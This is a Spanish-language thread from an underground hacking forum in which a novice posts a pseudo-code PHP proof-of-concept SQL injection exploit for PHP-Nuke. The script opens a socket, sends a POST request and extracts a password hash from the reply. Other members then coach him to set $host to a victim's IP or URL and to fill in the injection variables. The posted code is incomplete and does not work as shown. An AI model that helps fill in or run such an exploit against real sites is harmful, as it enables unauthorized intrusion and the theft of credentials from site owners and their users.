Normas del foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Noviembre 18, 2008, 05:55:28
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderadores:
OzX
,
y0u-uNsEcUre
) | Tema:
Duda con exploit despues de ejecutar
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: Duda con exploit despues de ejecutar (Leído 411 veces)
h4ckb0y
Miembro
Desconectado
Mensajes: 20
Duda con exploit despues de ejecutar
«
en:
Diciembre 24, 2006, 08:33:25 »
Código:
<?
/*
Neo Security Team - Pseudo-Code Proof of Concept Exploit
http://www.neosecurityteam.net
Paisterist
*/
set_time_limit(0);
$host="localhost";
$path="/phpnuke/";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data=""; /* Here the variables, like "bywhat" and "forwhat", with the
SQL Injection */
if ($fp) {
/* we put the POST request on $p variable, sending the data saved on
$data. */
fwrite($fp, $p);
while (!feof($fp)) {
$content .= fread($fp, 4096);
}
preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);
if ($matches[0])
print "<b>Hash: </b>".$matches[0];
}
?>
Lo compilo y ejecuto, pasa un tiempo y termina y no hace na, donde envia el hash?
En línea
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
WiNsMuRf
Colaborador
Desconectado
Mensajes: 858
Tux Rlz!
Re: Duda con exploit despues de ejecutar
«
Respuesta #1 en:
Diciembre 24, 2006, 10:12:27 »
yo tambien dudo de la funcionalidad de ese exploit
que tal si cambias el ultimo print por un echo??
saludos
En línea
No respondo mensajes privados ni atiendo en el messenger..
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2144
http://foro.undersecurity.net
Re: Duda con exploit despues de ejecutar
«
Respuesta #2 en:
Diciembre 24, 2006, 11:57:10 »
En línea
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Pr0gr4mer
Colaborador
Desconectado
Mensajes: 865
Pr0gr4mer al mango
Re: Duda con exploit despues de ejecutar
«
Respuesta #3 en:
Diciembre 24, 2006, 01:34:29 »
En línea
Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
San Buscador
.::Pr0gr4mer::.
zickox
Visitante
Re: Duda con exploit despues de ejecutar
«
Respuesta #4 en:
Diciembre 24, 2006, 03:43:04 »
«
Última modificación: Diciembre 24, 2006, 03:44:12 por zickox
»
En línea
h4ckb0y
Miembro
Desconectado
Mensajes: 20
Re: Duda con exploit despues de ejecutar
«
Respuesta #5 en:
Diciembre 25, 2006, 05:20:08 »
Si lo compile configurado, puse el exploit original aki, pero ya sabia k tniak e modifikarlo aunke en
$fp = fsockopen
$data= ""
no lo tngo claro. tengo que meter una inyeccion sql ?
En línea
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
Pr0gr4mer
Colaborador
Desconectado
Mensajes: 865
Pr0gr4mer al mango
Re: Duda con exploit despues de ejecutar
«
Respuesta #6 en:
Diciembre 26, 2006, 08:55:08 »
Citar
Claro que es para una web, este exploit es para phpnuke xD, explota el bug con una sql inyeccion y ya sabes hackboy kambia el valor de la variable $host por la ip de tu victima
salu2!!
PD: el path lo dice todo
Solamente la ip?? jejeje te falta unas cosas....
Citar
$host="localhost";
Aca va la IP
Citar
$fp = fsockopen($host, $port, $errno, $errstr, 30);
Aqui pone el host y el puerto
Citar
$data=""; /* Here the variables, like "bywhat" and "forwhat", with the
SQL Injection */
Como bien dice, alli van las variables de porque y paraque de la inyeccion sql.
Lo demas lo dejas como esta....
PD: Empiesa con la teoria primero amigo no es tan facil usar los exploits... va algunos son una pabada
Pr0gr4mer
«
Última modificación: Diciembre 26, 2006, 08:56:28 por Pr0gr4mer
»
En línea
Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
San Buscador
.::Pr0gr4mer::.
WiNsMuRf
Colaborador
Desconectado
Mensajes: 858
Tux Rlz!
Re: Duda con exploit despues de ejecutar
«
Respuesta #7 en:
Diciembre 28, 2006, 06:53:49 »
Citar
Citar
$host="localhost";
Aca va la IP
No necesariamente la ip...
puede ir la url, algo asi como
Necesitas ser usuario para ver los enlaces
Crear Usuario
Hacer Sesion
www.victima.com
saludos
En línea
No respondo mensajes privados ni atiendo en el messenger..
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderadores:
OzX
,
y0u-uNsEcUre
) | Tema:
Duda con exploit despues de ejecutar
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Seguridad
=> Phreaking
===> Moviles
=> Bug y Exploits
===> Directorio de Exploits
=> Wargames, Retos Hack
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas Generales
===> Php
===> Html, XHTML, CSS
===> Java - Java Script
===> CMS O Scripts Pre-Fabricados
===> Posicionamiento en buscadores
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Biblioteca Tecnica
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
===> Juegos de Consola
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.7
|
SMF © 2006-2007, Simple Machines LLC
Loading...